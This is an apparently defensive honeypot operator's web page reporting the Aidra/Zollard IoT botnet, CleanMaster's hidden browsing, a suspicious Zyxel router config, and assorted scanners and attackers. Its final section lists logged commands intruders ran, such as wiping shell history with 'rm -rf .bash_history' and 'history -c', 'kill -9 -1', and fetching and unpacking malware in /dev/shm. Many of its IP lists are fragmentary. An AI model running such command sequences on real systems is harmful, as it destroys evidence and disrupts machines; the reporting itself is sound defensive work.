No, we are not, we only report about menaces, exchange information with other researches and warn owners, authorities and providers. Nevertheless, in the past we infiltrated into a few hijacked hosts for a number of reasons:

Those were: a Truetel's host in Taiwan (2009), another one belonging to a tasmanian fireguard patrol (2010), an online shop in Poland (2011), several corporate servers (2011) in Spain (still online, see why and further info in spanish) and a few routers and set-top boxes that had been infected by the "Aidra" botnet (beginning of 2012), before we had made our own traps for this new malware.


App for Android "CleanMaster"

While reviewing logs, in april 2017 we found that some visits were followed by some others somehow automatically:
88.18.nnn.nnn - - [01/Apr/2017:16:35:46 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

88.18.nnn.nnn - - [01/Apr/2017:16:35:58 +0200] "GET /FolderInMyServer/FileInThatFolder HTTP/1.1" 206 1
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" - - [01/Apr/2017:16:39:43 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0); Connect Us

Other IPs behaving like that were and, all owned by Amazon EC2. The "user agent" was truthful: all those visitors had installed the app developed by Cheetah Mobile, a chinese company. More, even when you are not browsing the web, it connects frequently to a chinese IP. On april the 23th we asked them by email and never got an answer, so beware: you'll find nothing about this issue in their privacy policies, but the "CleanMaster" app browses the web along with you, literally.

Aidra botnet

In January 2012 we started detecting a great amount of attacks -mainly Telnet- coming from all sorts of devices like home routers, IPTV / set-top boxes, DVDRs, VoIP devices, IP cameras and media centers that had been hijacked by a new malware, named by its primary author "The Aidra bot-net".

Chances are that your desktop antivirus, firewall, etc. will neither detect it nor stop it. Try to keep your net devices off as long as possible, avoid -more than ever- default/empty/trivial passwords and close every port you don't really need.

Update January 2014: latest Aidra-like malware are targetting all sorts of embedded devices and overloading them with bitcoin mining tools. See how this device will soon get fried (let alone the electricity bill...):

The example above is a IP camera manufactured by built on top of a ARM hi3515 board, but any "internet of things" device might get infected, like SOHO routers, smart-TVs, set-top boxes... or a fridge :) Bellow, login page of a cheap Hikvision CCTV system, with such a brilliant default password for root as 12345.

Should you want to know more about this Aidra-like malware, known as Zollard, please see or For the list of IPs/hosts, see bellow.

We want everyone out there to know that we have been warning several hosting providers since 2012 about hosts of theirs acting as Aidra C&Cs. Some of them like OVH, Linode, Beirtelecom and Corexchange did nothing. Be warned: hosting your site on any of those providers means that you are likely to be blacklisted by most antimalware tools. On the contrary, we congratulate a few responsible services and companies:,, and

We want to thank in a special way those few particulars who answered to our first call-for-help, reporting logs, sharing information, etc. Thank you Claus Marxmeier, "Internick.internick" and Robert Sauber.

Q: How can I disinfect my device?
A: Quite often, just rebooting it will work. However, try to access it using Telnet: if you can't, perhaps it has been persistently hijacked or, most probably, your device will be dead. Some Aidra builders were so dumb that not only they will not success but they might have turned your device impaired. In that case, contact us, since chances are that you could recover it with a little help.

Q: How can I protect my devices?
A: If you really need Telnet, set a non-trivial password. Desktop tools such as antivirus, firewall, etc. will not help. They are made for taking care of the device that they are being run in, not your router, IPcam, NAS, TIVO...

Q: How many devices are infected worldwide?
A: It had been said that near 11000 but that was absolutely uncertain, it was only an estimation that somebody made based on a screenshot of a command panel. There are several Aidra botnets and variants and you would need to estimate how many devices have been infected by all of them. On top of that, just remember that a rebooted device very often will stay clean until a new infection, so the total can vary greatly in a matter of hours. Having said that, in june 2012 the amount of infections began to decrease. Sadly, in August there are botnets with about 18000 zombies.

Q: Is my smartphone or tablet in risk?
A: At the moment, not specially. Somebody missunderstood our report. We just said that -in theory- Aidra could infect some smartphones, since it can be run under all sorts of CPUs but we have never detected a single one. Actually, Aidra would need to be adjusted to take into account a particular file system, hardware, etc. as well as try something different than Telnet. That's why Aidra is seldom infecting those devices:first time we saw an infected Android device was in August 2012. Having said that, your smartphone can be infected by many other kinds of malwares. On a side note: both iOS and Android are based on Linux but their internals are quite particular.

Q: What about my desktop computer or laptop?
A: Currently there are not much reasons to worry about Aidra.

Q: Will be Linux unsafe from now on?
A: Not at all. Aidra takes advantage of dumb or lazy users/admins who don't care about passwords. You can buy the best safety-box in the world, but if you leave it open...

Q: Is Aidra such a great threat?
A: For individuals it depends on a number of things. If Aidra took over yout set-top box, for example, chances are that you will just find Internet slower than usual. But, if I were you, I wouldn't like to have any kind of malware inside my home router because all data can be trivially stolen. More, since september 2012, a italian botnet master is trying hard to raise money from Aidra, which has used for his bitcoins affairs, but he is also interested in smartcards, which would be much more worrying. Apart from that, we bet that, given the careless attitude of goverments and companies, sooner or later a malware of this kind will be improved enough as to scare the entire world.

Q: Which countries are more affected?
A: As said, it is difficult to say even how many infected devices there are. In Europe most nets have been commanded from Italy (despite using servers in other countries), while most infected devices used to be in Sweden, Switzerland, Netherlands and Poland. Lots also in India and China and not as many as expected in the USA and Japan. As of June 2012, Aidra had nearly vanished but there were still two very active botnet sets left. We sent evidences to the Carabinieri about the first one, and we got (not surprisingly) no answer. The other Aidra botnet set was alive and kicking but quite silent since august, though. Strangely, it was targetting IPs mostly in the US. Last, despite it was not its primary purpose, Aidra has been quite successully figthed since more than one year ago by Carnas's author (whose identity shall remain unreveladed).

Q: I would like to know in detail about Aidra, or get samples, source code...
A: Contact and tell us about you or your organization (which best apply) and what you want that stuff for.
Aidra hosts as of 17th Sept. 2012. Since then, read bellow.:

(*) Very active.
(**) Not a true Aidra but a "DDoS-only" version (Kaiten).
(***) Redirector disabled
(****) Attacking Monsanto websites

On sept. the 18th we were receiving so many malwares (and not only "Aidra fresh builds") that we thought that it would be worth to start the historic track bellow. Please note that, on the contrary, some of the Aidra builds that have been active for long are listed above.

sept. 23th attacking:
(both IPs, in turn, used by hackers)

120917A (2 malwares in this record)
2001:1af8:4300:a005:46:0:0:2 Linode

======= OVH Italia Gogrid Gogrid Gogrid Gogrid Gogrid Gogrid Gogrid

======== (

(We had an hiatus from december to february)

======== (Serverius)

======== (TurkDNS) (Limestone) (OVH) (BurstNet) (Pusat Media) (HostDime) ( (Uber Global) (Hostnoc) (Midphase) (FDCservers)

======== myLoc myLoc

======== WEDOS (Cz)

======== Dacentec (US) (OVH) or:
(most also resolve to

======== OVH VPS NET (Linode) (OC3, USA) (Sharktech)

======== Wedos (Cz)

============ Tilaa (NL) (already dead) (Germany)

============ (OVH)
Versions like this one are compiled with messages in a perfect italian:
"Alla prossima BoSS... baciamo le mani!" (we kiss the new boss' hands)
"Hai sbagliato Frocio di Merda!" (you did it wrong, -insult-)

(updated 130806)

(updated 130812) (USA, VPS Cheap)

Aidra had slowed down its new releases,
so a handfull versions weren't published during these months.

Starting with this one, nearly all new versions are "Zollard" malware.

============ OVH OVH Systems

"common Aidra" FranTech Solutions; april: calpolyfast·org

Bitcoin miner (OVH) > (Romania) (Secured Servers LLC)

Bitcoin miner ( (US)

============ OVH, FR

Bitcoin miner Fastreturn, US Quadranet. US Ecatel, NL

Bitcoin miner Serverius Holding (NL)

Same thing than 140209 using also: Serverius hosting (NL) and Dacentec, Inc. (US)

"Reloaded" 140209 miner version OC3 Networks & Web Solutions (US)

"Reloaded" 140210 miner version Ecatel Network, Netherlands

Surely a new 140202 version, quite complete "features":
Trying to permanently infect devices, adv. fraud
and stealing set-top credentials. resolving as '.' :) FranTech Solutions (US) FranTech Solutions (US) Eonix Corporation (US) (UK)

We are glad "Vypor" has been visiting us in April from

Again, a 140202 new version WholeSale - MJS Marketing, US., and a few more Snel Internet Services, Netherlands

Common Aidra Pallada Web Service / PWS-Network Russia

"Reloaded" 140210 miner version Ecatel Network,NL

================================== ONLINE S.A.S France

"Reloaded" 140210 miner version Snel, Netherlands Ecatel Network,NL, now in TCP 3342 DataWagon LLC US


Standard Aidra AS16276 OVH AS16276 OVH Hosting Canada

New 140209 version in TCP 9003, Fastreturn, US former, now WholeSale - MJS Marketing

Just another "Vypor" clon TCP 8005 Ecatel NL Bahnhof Internet, Sweden

Rebuilt 140815 version in TCP 65533 and 65534 Ecatel NL AS46816 Directspace, AS8473 Bahnhof Internet, Sweden

========= AS9009 M247 Open Hosting, UK AS32097 WholeSale MJS Marketing

Rebuilt 140815 version, same IPs

About our Twitter account
All tweets are randomly delayed: it may take hours or days since the actual detection. Besides, due to Twitter limits, we tweet only a fraction of all detections (usually we tend to skip already wellknown bad IPs such as those famous chinese SSH attackers)

For those who send traffic claiming to be "good", for academic purposes or for the sake of our own safety, please note that our policy is simple: a unique unexpected SYN packet may be enough to be reported. If your intentions are not hostile, surely the World already knows about them and our reports don't mean a thing.

If you are a hosting company, ISP or alike, don't ask us for detailed logs, evidences, etc. unless they are really needed. Firstly, if you really want to know about them, you should know that in most cases, it's as easy as just monitoring outbond traffic related to the reported attacks. Secondly, we can not provide dozens of that kind of reports for free each single day. Keeping an eye on your customers' behaviour is your job, not ours. Besides, we will never answer to dumb Twitter bots spitting "Please report that issue to blah blah" tweets, only for entering in a "customer ticket hell" and get a final response such as "Sorry, you are not a customer of ours, please email to... ".

Currently, our Tweets fall into one of this categories:
"ssh": SSH daemon/server, usually port TCP 22, although we watch alternative ports for most services.

"telnet": Telnet daemon/server, usually TCP 23.

"mailer": Email daemon/server, several ports.

"rdp": Windows terminal server (Windows), usually TCP 3389.

"vnc": Remote Desktop Servers, usually TCP 5900.

"ftp": File Transfer Protocol, usually TCP 21.

"spam": Email/forum/referral/you-name-it spammers, close affiliates or just those who pay for it.

"malware": Plain hosting, command & control servers, etc.

"http": Threats, scans, bad crawlers, etc. targetting web servers and related technologies such as HTTPS, proxies, PHP, *SQL...

"ntp": Network Time Protocol, commonly abused for DDoS amplification attacks.

"dns": Domain Name System, commonly abused for DDoS amplification attacks.

"smb": Windows shares (NetBIOS, SMB, CIFS).

"unspecified": Such as those targetting port 19 "CharGen", port scans, ping floods, etc.

Yet one more backdoor in an embedded device?

After taking a look at the file system of a used Zyxel_P-2612HNU that we recently got, we found a weird thing apart of the already known vulnerabilities such as the "NsaRescueAngel" issue. If you type gzip -d /mnt/NAND/etc/rc.conf.gz -c in a Telnet session, you'll get:

<< dl_auth
dl_auth_realm=""v dl_auth_nonce="3nanfc5fo"
>> dl_auth

<< tr69_auth
>> tr69_auth

<< tr69_misc
>> tr69_misc
<< mgmt_server
>> mgmt_server

<< manageable_device
>> manageable_device

<< lanconf_security
>> lanconf_security belongs to CSC (Computer Sciences Corporation, Virginia, US) and there are/were four domains that pointed to that IP: (protected whois), (mexican company), (brazilian company) and (protected whois). Please someone skilled in TR069 tell us wether this could be a backdoor and who might have put it here or, on the contrary, it's just debugging data left behing.

Since June the 21th the website was attacking servers in Spain. First of all, we warned the ISP, the webmaster and that council's authorities -none was kind enough as to reply a mere "thanks"- and afterwards we investigated who the actual attackers could be. Let's suppose than in "Molins de Rei" there are no fanatics related to that website, so we can assume they were using hijacked servers, apart of some proxies and a lot of IPs from islamic countries. After a few searching in Google, Whois, Geolocation, etc. we got to know that the culprits are a islamic gang of script kiddies that compite mostly for defacements, while they share pro-islamic interests.

The good news is that they are clumsy and not very skilled: most just look for missconfigured servers with "PUT" enabled; they simply try to upload a file and then download it, which means that PUT is working for sure. So we got one of those files, a GIF image whose author uses as a "signature" (filename in Russian, he's smart as can be) and we waited...

In a few hours we saw the first "PUT /nyet.gif" + "GET /nyet.gif" attempt. Believing he had succeed, he hurried to report his "achivement" to his mates :) in the infamous and, in a moment, we began receiving more attacks of the kind as well as some XSS. Some days later they gave up, but meanwhile we have been collecting all their IPs (please note: we are not listing proxies or hijacked servers, which, BTW, is mostly a Kosovar speciality):

IP address Other information
AS36947 Algerie Telecom
AS36947 Algerie Telecom
AS197328, Turkey
AS29256 Syrian Telecommunications
AS35819 Etihad Etisalat Company, Saudi Arabia
AS36947 Annaba Telecom, Algeria
AS51407 Mada ALArab LTD Segment, Palestine
AS37492 Orange - Agence Tunisienne Internet
AS36947 Region Chlef, Algeria
AS6713 ADSL_Maroc_telecom, Rabat, Morocco
AS29256 Tarassul ISP, Syrian Telecommunications
AS12975 Palestine Telecom
AS35819 Saudi Arabia
AS9121 TTNET Turk Telekomunikasyon
AS37492 ORANGE-TN Tunisia
AS6713 IAM-AS,MA Morocco Tangier Maroc Telecom
AS6713 ADSL_Maroc_telecom
AS8452 TE Data, Egypt
Beware fake Microsoft assistance scam

In May-June 2014 several people in Spain was phoned from a fake Microsoft customer service. So far these are the numbers we got to know: 16077670057 and 15124511556. Beware also of 4935120443, 442033100000 and 18176499077. under attack

No wonder, just another one, but this time it was more intense than usual although not sophisticated at all: they simply tried to overload this server by downloading some files over and over. By using our own deny list -excepcionally and urgently updated during those days- we got rid of most malicious visitors (nearly all being proxies in infected boxes or Tor nodes). Happily, a choice of them went soon offline because they can not cope with some bounced back traffic :) Please, dear attacker: (as long as you can't find a better way) keep on trying, we miss your huge amount of requests!!!
Yet another University scanning the entire world!

In this website we have already talked about the University of Columbia peeking inside each and every IP in the world since years ago. Well, it seems to be fashion these days in the USA, since in 2013 the University of Michigan began a similar "research". If you want to get rid of those visits, block all IPs from to
WTF is going on with some Microsoft's IPs?

8075 | MICROSOFT-CORP---MSN-AS-BLOCK | | 2012-11-03 17:15:18 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | | 2012-11-08 06:53:08 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | | 2012-11-08 06:30:55 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | | 2012-11-08 05:49:12 | vncprobe
One incident in detail:
08/11/2012 04:13:32 Got connection from client
08/11/2012 04:13:32 authProcessClientMessage: authentication failed from
08/11/2012 04:13:32 rfbAuthProcessClientMessage: password check failed
08/11/2012 04:13:32 Client gone
08/11/2012 04:13:32 Statistics events Transmit/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:32 Statistics events Received/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:33 Got connection from client
July 2013, some more detected from MSN-AS-BLOCK:
(Yet another) Remote desktop attack
We receive attacks to port 3389 on a daily basis, but these days they have increased hugely. This is what we got yesterday (sept. 22th) from one IP alone: ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (

Universities and hacking

The fact that there are important and prestigious institutions with infected computers is worrying. But even more, when we are talking about departments concerning teaching about computers. In the past we warned some of them in Germany, USA and the UK, and all of them sorted the issue out promptly. On the contrary, some others like the spanish UNED neither answered nor fixed them. Right this september, it happened the same again: this time we warned the "Dipartartimento di Informatica" of the University of Milan about which was attacking others' 3389 ports. More than one month ago, we wrote to nine email addresses: professors, researches and bureau... none of them was kind enough as to write back a single line. So, we still don't know wether it was an infected box or they were the true hackers but, too good, at least we detected no more attacks since then.

Why does Nokia want to know my email password?

Did you know that when you use the Nokia's email app, you are giving them your address and password, as seen in this blog?. In Nov. 2011 we checked it out by ourselves using a Nokia X3-02 and a gMail account:

Chinese and russian scanners
In Oct. 2011 a number of IPs brought to our attention. Mostly located in China, those people has been scanning the rest of the world since years ago.

Clearly linked to "Proxyfire" Other scanners
Note that it is useless to complain or warn someone, since they are not hijacked devices. Apart of other intentions, as a result of their actions many others are wasting time and resources, and that's why we [will do our best for disturbing them a little from March on.] are glad to see that Proxyfire has been facing some trouble during april:

The other scanners needed to set up at least five spare (until then) sites after april 2012: proxyproxys·com piggmail·com verysurf·com nsegame·com

A boo for a couple image-hosting places
In sept. 2011 our site suffered a persistent attack from, a (by then) hijacked server in Poland. We contacted the owners and studied the malware. As a result, we got to know that those indonesians were using a few image-sharing sites for their "soft", so we contacted and asking for their help (a third site was clearly involved in the malicious events). No answer at all.

Where on earth are the Honeypots?
After reading the "Cyber Crime Alert" report by the FBI (spring of 2011) it seems that bad guys think that here, in Spain, we run an incredible 69 per cent of the Honeypots in the World and, besides, they use to share the IPs where honeypots are supposed to be. Well, concerning our own IPs, wether they are right or not must remain unrevealed, but the given percentage is utterly wrong. In fact, we don't know of any other Honeypot here apart from ours.

Weird ways of figthting cybercrime:
Visit from (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") : - - [17/Feb/2010:13:57:49 +0200] "GET pollbooth.php?include_path HTTP/1.1" 404 613 "-" "Mozilla/5.0" "-"

No comment :D

September of 2009: attackers tried to login under 10374 different user names.
The most attacked were:

paul 190
suporte 132
sam 114
Advice: choosing user names in any other language than english is safer. Spanish speakers should avoid "David", "Amanda" and "Martin" (common names in both languages).
Bad boys never sleep:
2009, fall of the night of the 24th. While many countries are celebrating Christmas Eve, attackers were taking advantage of it. The most striking one detected by us was during that hours was a SSH dictionary attack from It lasted for 8 hours and they tried 20.859 username + password combinations.

2010, July the 7th. While millions are enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reports a (not actually) succesful SSH dictionary attack:

Jul 7 19:27:42 (void) sshd[28641]: Accepted password for (not shown) from port 47065 ssh2
Jul 7 20:25:37 (void) sshd[12823]: Accepted password for (not shown) from port 46649 ssh2
Jul 7 21:17:08 (void) sshd[8048]: Accepted password for (not shown) from port 1266 ssh2
Jul 7 23:45:48 (void) sshd[28775]: Accepted password for (not shown) from port 33195 ssh2
Jul 7 23:47:14 (void) sshd[31450]: Accepted password for (not shown) from port 51866 ssh2
Jul 7 23:53:28 (void) sshd[8496]: Accepted password for (not shown) from port 30856 ssh2
Some flashy detections:
Telnet scans from - (Columbia University) which happened to be a false positive. Read about their project. Nevertheless, after a re-visit in Sep. 2011, we found a number of things that we dislike:
They don't say when it will come to an end, it is always an "ongoing" project. I guess that knocking at other's doors should last as short as possible. Since they have moved to SSH probing, what's next?
They are making money of it: a company, several patents, sponsored by several military offices, conferences, publications... Therefore, output about the results is scarce. If noboby else is going to take advantage of the investigations, it does not make much difference compared to other daily scans.
Fake results in Gnutella network from ( in March 2010... when looking for public domain files!
Port scan from (, owned by McAfee Antivirus) in December 21th 2009.
Sharing fake files in Gnutella network from (Microsoft Corporation), October 21th and November 1st of 2009..
Port scan from (Avast Antivirus) in September and October of 2009.
Assorted SSH attacks
Gathering information

ls -a
uname -a
cat /proc/cpuifno
ps x
curl -O

After a previous succesful login

rm -rf .bash_history
history -c
ps x
ls -a

Attempting to get rid of the honeypot

kill -9 -1
exit Sending malware to the target

uname -a
tar zxvf udp.tgz
Other deliveries came from

Attackers don't want us to see what they do


Attempting to run malware

cd /dev/shm

Dumb DoS or speed test?

